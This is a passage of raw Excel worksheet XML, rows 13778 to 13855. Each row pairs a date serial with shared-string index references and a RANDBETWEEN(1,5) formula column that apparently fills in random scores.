    <row r="13778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13778" s="1">
        <v>43260.536516203705</v>
      </c>
      <c r="C13778" t="s">
        <v>48</v>
      </c>
      <c r="E13778" t="s">
        <v>811</v>
      </c>
      <c r="F13778">
        <f t="shared" ca="1" si="215"/>
        <v>2</v>
      </c>
    </row>
    <row r="13779" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13779" s="1">
        <v>43260.528622685182</v>
      </c>
      <c r="C13779" t="s">
        <v>8588</v>
      </c>
      <c r="D13779" t="s">
        <v>192</v>
      </c>
      <c r="E13779" s="2" t="s">
        <v>12357</v>
      </c>
      <c r="F13779">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13780" s="1">
        <v>43260.49050925926</v>
      </c>
      <c r="C13780" t="s">
        <v>1050</v>
      </c>
      <c r="E13780" t="s">
        <v>12358</v>
      </c>
      <c r="F13780">
        <f t="shared" ca="1" si="215"/>
        <v>2</v>
      </c>
    </row>
    <row r="13781" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13781" s="1">
        <v>43260.286423611113</v>
      </c>
      <c r="C13781" t="s">
        <v>3027</v>
      </c>
      <c r="D13781" t="s">
        <v>494</v>
      </c>
      <c r="E13781" s="2" t="s">
        <v>12359</v>
      </c>
      <c r="F13781">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13782" s="1">
        <v>43260.21570601852</v>
      </c>
      <c r="C13782" t="s">
        <v>10</v>
      </c>
      <c r="D13782" t="s">
        <v>222</v>
      </c>
      <c r="E13782" t="s">
        <v>12360</v>
      </c>
      <c r="F13782">
        <f t="shared" ca="1" si="215"/>
        <v>2</v>
      </c>
    </row>
    <row r="13783" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13783" s="1">
        <v>43260.118425925924</v>
      </c>
      <c r="C13783" t="s">
        <v>836</v>
      </c>
      <c r="D13783" t="s">
        <v>993</v>
      </c>
      <c r="E13783" s="2" t="s">
        <v>12361</v>
      </c>
      <c r="F13783">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13784" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13784" s="1">
        <v>43260.110046296293</v>
      </c>
      <c r="C13784" t="s">
        <v>430</v>
      </c>
      <c r="D13784" t="s">
        <v>381</v>
      </c>
      <c r="E13784" t="s">
        <v>12362</v>
      </c>
      <c r="F13784">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13785" s="1">
        <v>43260.106712962966</v>
      </c>
      <c r="C13785" t="s">
        <v>41</v>
      </c>
      <c r="E13785" t="s">
        <v>12363</v>
      </c>
      <c r="F13785">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13786" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13786" s="1">
        <v>43260.050937499997</v>
      </c>
      <c r="C13786" t="s">
        <v>41</v>
      </c>
      <c r="E13786" t="s">
        <v>12364</v>
      </c>
      <c r="F13786">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13787" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13787" s="1">
        <v>43260.003622685188</v>
      </c>
      <c r="C13787" t="s">
        <v>410</v>
      </c>
      <c r="D13787" t="s">
        <v>1993</v>
      </c>
      <c r="E13787" s="2" t="s">
        <v>12365</v>
      </c>
      <c r="F13787">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13788" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13788" s="1">
        <v>43260.001018518517</v>
      </c>
      <c r="C13788" t="s">
        <v>2156</v>
      </c>
      <c r="D13788" t="s">
        <v>36</v>
      </c>
      <c r="E13788" s="2" t="s">
        <v>12366</v>
      </c>
      <c r="F13788">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13789" s="1">
        <v>43259.979548611111</v>
      </c>
      <c r="C13789" t="s">
        <v>41</v>
      </c>
      <c r="E13789" t="s">
        <v>12367</v>
      </c>
      <c r="F13789">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13790" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13790" s="1">
        <v>43259.968032407407</v>
      </c>
      <c r="C13790" t="s">
        <v>41</v>
      </c>
      <c r="E13790" t="s">
        <v>12368</v>
      </c>
      <c r="F13790">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13791" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13791" s="1">
        <v>43259.950671296298</v>
      </c>
      <c r="C13791" t="s">
        <v>2428</v>
      </c>
      <c r="D13791" t="s">
        <v>821</v>
      </c>
      <c r="E13791" s="2" t="s">
        <v>12369</v>
      </c>
      <c r="F13791">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13792" s="1">
        <v>43259.846342592595</v>
      </c>
      <c r="C13792" t="s">
        <v>10</v>
      </c>
      <c r="D13792" t="s">
        <v>6</v>
      </c>
      <c r="E13792" t="s">
        <v>12370</v>
      </c>
      <c r="F13792">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13793" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13793" s="1">
        <v>43259.75677083333</v>
      </c>
      <c r="C13793" t="s">
        <v>2210</v>
      </c>
      <c r="D13793" t="s">
        <v>92</v>
      </c>
      <c r="E13793" s="2" t="s">
        <v>12371</v>
      </c>
      <c r="F13793">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13794" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13794" s="1">
        <v>43259.723344907405</v>
      </c>
      <c r="C13794" t="s">
        <v>10</v>
      </c>
      <c r="D13794" t="s">
        <v>89</v>
      </c>
      <c r="E13794" s="2" t="s">
        <v>12372</v>
      </c>
      <c r="F13794">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13795" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13795" s="1">
        <v>43259.719895833332</v>
      </c>
      <c r="C13795" t="s">
        <v>16</v>
      </c>
      <c r="E13795" s="2" t="s">
        <v>12373</v>
      </c>
      <c r="F13795">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13796" s="1">
        <v>43259.698206018518</v>
      </c>
      <c r="C13796" t="s">
        <v>10</v>
      </c>
      <c r="D13796" t="s">
        <v>312</v>
      </c>
      <c r="E13796" t="s">
        <v>12374</v>
      </c>
      <c r="F13796">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13797" s="1">
        <v>43259.682280092595</v>
      </c>
      <c r="C13797" t="s">
        <v>10</v>
      </c>
      <c r="D13797" t="s">
        <v>112</v>
      </c>
      <c r="E13797" t="s">
        <v>12375</v>
      </c>
      <c r="F13797">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13798" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13798" s="1">
        <v>43259.681527777779</v>
      </c>
      <c r="C13798" t="s">
        <v>6829</v>
      </c>
      <c r="D13798" t="s">
        <v>750</v>
      </c>
      <c r="E13798" s="2" t="s">
        <v>12376</v>
      </c>
      <c r="F13798">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13799" s="1">
        <v>43259.672071759262</v>
      </c>
      <c r="C13799" t="s">
        <v>41</v>
      </c>
      <c r="E13799" t="s">
        <v>12377</v>
      </c>
      <c r="F13799">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13800" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A13800" s="1">
        <v>43259.636331018519</v>
      </c>
      <c r="C13800" t="s">
        <v>43</v>
      </c>
      <c r="D13800" t="s">
        <v>20</v>
      </c>
      <c r="E13800" s="2" t="s">
        <v>12378</v>
      </c>
      <c r="F13800">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13801" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13801" s="1">
        <v>43259.628530092596</v>
      </c>
      <c r="C13801" t="s">
        <v>10</v>
      </c>
      <c r="D13801" t="s">
        <v>178</v>
      </c>
      <c r="E13801" s="2" t="s">
        <v>12379</v>
      </c>
      <c r="F13801">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13802" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13802" s="1">
        <v>43259.624328703707</v>
      </c>
      <c r="C13802" t="s">
        <v>3049</v>
      </c>
      <c r="E13802" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13802">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13803" s="1">
        <v>43259.613668981481</v>
      </c>
      <c r="C13803" t="s">
        <v>260</v>
      </c>
      <c r="E13803" t="s">
        <v>12380</v>
      </c>
      <c r="F13803">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13804" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A13804" s="1">
        <v>43259.607152777775</v>
      </c>
      <c r="C13804" t="s">
        <v>2210</v>
      </c>
      <c r="D13804" t="s">
        <v>178</v>
      </c>
      <c r="E13804" s="2" t="s">
        <v>12381</v>
      </c>
      <c r="F13804">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13805" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13805" s="1">
        <v>43259.58997685185</v>
      </c>
      <c r="C13805" t="s">
        <v>10</v>
      </c>
      <c r="D13805" t="s">
        <v>374</v>
      </c>
      <c r="E13805" s="2" t="s">
        <v>12382</v>
      </c>
      <c r="F13805">
        <f t="shared" ca="1" si="215"/>
        <v>2</v>
      </c>
    </row>
    <row r="13806" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13806" s="1">
        <v>43259.588321759256</v>
      </c>
      <c r="C13806" t="s">
        <v>73</v>
      </c>
      <c r="D13806" t="s">
        <v>46</v>
      </c>
      <c r="E13806" s="2" t="s">
        <v>12383</v>
      </c>
      <c r="F13806">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13807" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13807" s="1">
        <v>43259.587708333333</v>
      </c>
      <c r="C13807" t="s">
        <v>634</v>
      </c>
      <c r="D13807" t="s">
        <v>158</v>
      </c>
      <c r="E13807" s="2" t="s">
        <v>12384</v>
      </c>
      <c r="F13807">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13808" s="1">
        <v>43259.569398148145</v>
      </c>
      <c r="C13808" t="s">
        <v>10</v>
      </c>
      <c r="D13808" t="s">
        <v>6</v>
      </c>
      <c r="E13808" t="s">
        <v>12385</v>
      </c>
      <c r="F13808">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13809" s="1">
        <v>43259.536597222221</v>
      </c>
      <c r="C13809" t="s">
        <v>10</v>
      </c>
      <c r="D13809" t="s">
        <v>39</v>
      </c>
      <c r="E13809" t="s">
        <v>12386</v>
      </c>
      <c r="F13809">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13810" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13810" s="1">
        <v>43259.518935185188</v>
      </c>
      <c r="C13810" t="s">
        <v>3049</v>
      </c>
      <c r="E13810" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13810">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13811" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13811" s="1">
        <v>43259.496342592596</v>
      </c>
      <c r="C13811" t="s">
        <v>41</v>
      </c>
      <c r="E13811" s="2" t="s">
        <v>12387</v>
      </c>
      <c r="F13811">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13812" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13812" s="1">
        <v>43259.494664351849</v>
      </c>
      <c r="C13812" t="s">
        <v>6</v>
      </c>
      <c r="D13812" t="s">
        <v>25</v>
      </c>
      <c r="E13812" s="2" t="s">
        <v>12388</v>
      </c>
      <c r="F13812">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13813" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13813" s="1">
        <v>43259.478043981479</v>
      </c>
      <c r="C13813" t="s">
        <v>3049</v>
      </c>
      <c r="E13813" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13813">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13814" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13814" s="1">
        <v>43259.437731481485</v>
      </c>
      <c r="C13814" t="s">
        <v>3049</v>
      </c>
      <c r="E13814" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13814">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13815" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13815" s="1">
        <v>43259.435023148151</v>
      </c>
      <c r="C13815" t="s">
        <v>3049</v>
      </c>
      <c r="E13815" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13815">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13816" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13816" s="1">
        <v>43259.425995370373</v>
      </c>
      <c r="C13816" t="s">
        <v>124</v>
      </c>
      <c r="E13816" s="2" t="s">
        <v>12389</v>
      </c>
      <c r="F13816">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13817" s="1">
        <v>43259.418020833335</v>
      </c>
      <c r="C13817" t="s">
        <v>41</v>
      </c>
      <c r="E13817" t="s">
        <v>12390</v>
      </c>
      <c r="F13817">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13818" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13818" s="1">
        <v>43259.407870370371</v>
      </c>
      <c r="C13818" t="s">
        <v>3049</v>
      </c>
      <c r="E13818" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13818">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13819" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13819" s="1">
        <v>43259.353506944448</v>
      </c>
      <c r="C13819" t="s">
        <v>69</v>
      </c>
      <c r="E13819" s="2" t="s">
        <v>12391</v>
      </c>
      <c r="F13819">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13820" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13820" s="1">
        <v>43259.330613425926</v>
      </c>
      <c r="C13820" t="s">
        <v>2733</v>
      </c>
      <c r="D13820" t="s">
        <v>124</v>
      </c>
      <c r="E13820" s="2" t="s">
        <v>12392</v>
      </c>
      <c r="F13820">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13821" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13821" s="1">
        <v>43259.31181712963</v>
      </c>
      <c r="C13821" t="s">
        <v>158</v>
      </c>
      <c r="E13821" s="2" t="s">
        <v>12393</v>
      </c>
      <c r="F13821">
        <f t="shared" ca="1" si="215"/>
        <v>5</v>
      </c>
    </row>
    <row r="13822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13822" s="1">
        <v>43259.27516203704</v>
      </c>
      <c r="C13822" t="s">
        <v>3515</v>
      </c>
      <c r="E13822" t="s">
        <v>12394</v>
      </c>
      <c r="F13822">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13823" s="1">
        <v>43259.263611111113</v>
      </c>
      <c r="C13823" t="s">
        <v>48</v>
      </c>
      <c r="E13823" t="s">
        <v>12395</v>
      </c>
      <c r="F13823">
        <f t="shared" ca="1" si="215"/>
        <v>1</v>
      </c>
    </row>
    <row r="13824" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13824" s="1">
        <v>43259.226122685184</v>
      </c>
      <c r="C13824" t="s">
        <v>71</v>
      </c>
      <c r="E13824" s="2" t="s">
        <v>12396</v>
      </c>
      <c r="F13824">
        <f t="shared" ca="1" si="215"/>
        <v>3</v>
      </c>
    </row>
    <row r="13825" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A13825" s="1">
        <v>43259.167708333334</v>
      </c>
      <c r="C13825" t="s">
        <v>71</v>
      </c>
      <c r="E13825" s="2" t="s">
        <v>12397</v>
      </c>
      <c r="F13825">
        <f t="shared" ca="1" si="215"/>
        <v>4</v>
      </c>
    </row>
    <row r="13826" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13826" s="1">
        <v>43259.155046296299</v>
      </c>
      <c r="C13826" t="s">
        <v>173</v>
      </c>
      <c r="D13826" t="s">
        <v>1036</v>
      </c>
      <c r="E13826" s="2" t="s">
        <v>12398</v>
      </c>
      <c r="F13826">
        <f t="shared" ref="F13826:F13889" ca="1" si="216">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="13827" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13827" s="1">
        <v>43259.141689814816</v>
      </c>
      <c r="C13827" t="s">
        <v>65</v>
      </c>
      <c r="E13827" s="2" t="s">
        <v>12399</v>
      </c>
      <c r="F13827">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13828" s="1">
        <v>43259.137523148151</v>
      </c>
      <c r="C13828" t="s">
        <v>559</v>
      </c>
      <c r="E13828" t="s">
        <v>12400</v>
      </c>
      <c r="F13828">
        <f t="shared" ca="1" si="216"/>
        <v>3</v>
      </c>
    </row>
    <row r="13829" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13829" s="1">
        <v>43259.044189814813</v>
      </c>
      <c r="C13829" t="s">
        <v>2210</v>
      </c>
      <c r="D13829" t="s">
        <v>480</v>
      </c>
      <c r="E13829" s="2" t="s">
        <v>12401</v>
      </c>
      <c r="F13829">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13830" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13830" s="1">
        <v>43258.805173611108</v>
      </c>
      <c r="C13830" t="s">
        <v>10</v>
      </c>
      <c r="D13830" t="s">
        <v>271</v>
      </c>
      <c r="E13830" s="2" t="s">
        <v>12402</v>
      </c>
      <c r="F13830">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13831" s="1">
        <v>43258.803819444445</v>
      </c>
      <c r="C13831" t="s">
        <v>10</v>
      </c>
      <c r="D13831" t="s">
        <v>23</v>
      </c>
      <c r="E13831" t="s">
        <v>12403</v>
      </c>
      <c r="F13831">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13832" s="1">
        <v>43258.800798611112</v>
      </c>
      <c r="C13832" t="s">
        <v>461</v>
      </c>
      <c r="D13832" t="s">
        <v>312</v>
      </c>
      <c r="E13832" t="s">
        <v>12404</v>
      </c>
      <c r="F13832">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13833" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13833" s="1">
        <v>43258.798981481479</v>
      </c>
      <c r="C13833" t="s">
        <v>10</v>
      </c>
      <c r="D13833" t="s">
        <v>23</v>
      </c>
      <c r="E13833" s="2" t="s">
        <v>12405</v>
      </c>
      <c r="F13833">
        <f t="shared" ca="1" si="216"/>
        <v>3</v>
      </c>
    </row>
    <row r="13834" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13834" s="1">
        <v>43258.786377314813</v>
      </c>
      <c r="C13834" t="s">
        <v>10</v>
      </c>
      <c r="D13834" t="s">
        <v>178</v>
      </c>
      <c r="E13834" s="2" t="s">
        <v>12406</v>
      </c>
      <c r="F13834">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13835" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13835" s="1">
        <v>43258.748611111114</v>
      </c>
      <c r="C13835" t="s">
        <v>144</v>
      </c>
      <c r="E13835" s="2" t="s">
        <v>12407</v>
      </c>
      <c r="F13835">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13836" s="1">
        <v>43258.745787037034</v>
      </c>
      <c r="C13836" t="s">
        <v>10</v>
      </c>
      <c r="D13836" t="s">
        <v>92</v>
      </c>
      <c r="E13836" t="s">
        <v>12408</v>
      </c>
      <c r="F13836">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13837" s="1">
        <v>43258.724930555552</v>
      </c>
      <c r="C13837" t="s">
        <v>280</v>
      </c>
      <c r="E13837" t="s">
        <v>12409</v>
      </c>
      <c r="F13837">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13838" s="1">
        <v>43258.698807870373</v>
      </c>
      <c r="C13838" t="s">
        <v>10</v>
      </c>
      <c r="D13838" t="s">
        <v>6</v>
      </c>
      <c r="F13838">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13839" s="1">
        <v>43258.691365740742</v>
      </c>
      <c r="C13839" t="s">
        <v>10</v>
      </c>
      <c r="D13839" t="s">
        <v>6</v>
      </c>
      <c r="E13839" t="s">
        <v>12410</v>
      </c>
      <c r="F13839">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13840" s="1">
        <v>43258.683923611112</v>
      </c>
      <c r="C13840" t="s">
        <v>535</v>
      </c>
      <c r="D13840" t="s">
        <v>1036</v>
      </c>
      <c r="E13840" t="s">
        <v>12198</v>
      </c>
      <c r="F13840">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13841" s="1">
        <v>43258.639201388891</v>
      </c>
      <c r="C13841" t="s">
        <v>1325</v>
      </c>
      <c r="F13841">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13842" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13842" s="1">
        <v>43258.619537037041</v>
      </c>
      <c r="C13842" t="s">
        <v>222</v>
      </c>
      <c r="E13842" s="2" t="s">
        <v>12411</v>
      </c>
      <c r="F13842">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13843" s="1">
        <v>43258.619143518517</v>
      </c>
      <c r="C13843" t="s">
        <v>41</v>
      </c>
      <c r="E13843" t="s">
        <v>12412</v>
      </c>
      <c r="F13843">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13844" s="1">
        <v>43258.618877314817</v>
      </c>
      <c r="C13844" t="s">
        <v>535</v>
      </c>
      <c r="D13844" t="s">
        <v>158</v>
      </c>
      <c r="E13844" t="s">
        <v>12198</v>
      </c>
      <c r="F13844">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13845" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13845" s="1">
        <v>43258.600034722222</v>
      </c>
      <c r="C13845" t="s">
        <v>10</v>
      </c>
      <c r="D13845" t="s">
        <v>80</v>
      </c>
      <c r="E13845" s="2" t="s">
        <v>12413</v>
      </c>
      <c r="F13845">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13846" s="1">
        <v>43258.574247685188</v>
      </c>
      <c r="C13846" t="s">
        <v>10</v>
      </c>
      <c r="D13846" t="s">
        <v>151</v>
      </c>
      <c r="E13846" t="s">
        <v>12414</v>
      </c>
      <c r="F13846">
        <f t="shared" ca="1" si="216"/>
        <v>2</v>
      </c>
    </row>
    <row r="13847" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13847" s="1">
        <v>43258.573634259257</v>
      </c>
      <c r="C13847" t="s">
        <v>6</v>
      </c>
      <c r="D13847" t="s">
        <v>25</v>
      </c>
      <c r="E13847" s="2" t="s">
        <v>12415</v>
      </c>
      <c r="F13847">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13848" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13848" s="1">
        <v>43258.56145833333</v>
      </c>
      <c r="C13848" t="s">
        <v>10</v>
      </c>
      <c r="D13848" t="s">
        <v>71</v>
      </c>
      <c r="E13848" t="s">
        <v>12416</v>
      </c>
      <c r="F13848">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13849" s="1">
        <v>43258.555474537039</v>
      </c>
      <c r="C13849" t="s">
        <v>10</v>
      </c>
      <c r="D13849" t="s">
        <v>494</v>
      </c>
      <c r="E13849" t="s">
        <v>12417</v>
      </c>
      <c r="F13849">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13850" s="1">
        <v>43258.549733796295</v>
      </c>
      <c r="C13850" t="s">
        <v>10</v>
      </c>
      <c r="D13850" t="s">
        <v>11</v>
      </c>
      <c r="E13850" t="s">
        <v>12418</v>
      </c>
      <c r="F13850">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13851" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A13851" s="1">
        <v>43258.531354166669</v>
      </c>
      <c r="C13851" t="s">
        <v>6</v>
      </c>
      <c r="D13851" t="s">
        <v>25</v>
      </c>
      <c r="E13851" s="2" t="s">
        <v>12419</v>
      </c>
      <c r="F13851">
        <f t="shared" ca="1" si="216"/>
        <v>5</v>
      </c>
    </row>
    <row r="13852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13852" s="1">
        <v>43258.52107638889</v>
      </c>
      <c r="C13852" t="s">
        <v>10</v>
      </c>
      <c r="D13852" t="s">
        <v>112</v>
      </c>
      <c r="E13852" t="s">
        <v>12420</v>
      </c>
      <c r="F13852">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13853" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13853" s="1">
        <v>43258.517025462963</v>
      </c>
      <c r="C13853" t="s">
        <v>10</v>
      </c>
      <c r="D13853" t="s">
        <v>20</v>
      </c>
      <c r="E13853" s="2" t="s">
        <v>12421</v>
      </c>
      <c r="F13853">
        <f t="shared" ca="1" si="216"/>
        <v>1</v>
      </c>
    </row>
    <row r="13854" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13854" s="1">
        <v>43258.515486111108</v>
      </c>
      <c r="C13854" t="s">
        <v>1501</v>
      </c>
      <c r="E13854" s="2" t="s">
        <v>12422</v>
      </c>
      <c r="F13854">
        <f t="shared" ca="1" si="216"/>
        <v>4</v>
      </c>
    </row>
    <row r="13855" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13855" s="1">
        <v>43258.51121527778</v>
      </c>
      <c r="C13855" t="s">
        <v>6</v>
      </c>
      <c r="D13855" t="s">
        <v>821</v>
      </c>
      <c r="E13855" s="2" t="s">
        <v>12423</v>
      </c>
      <c r="F13855">
        <f t="shared" ca="1" si="216"/>
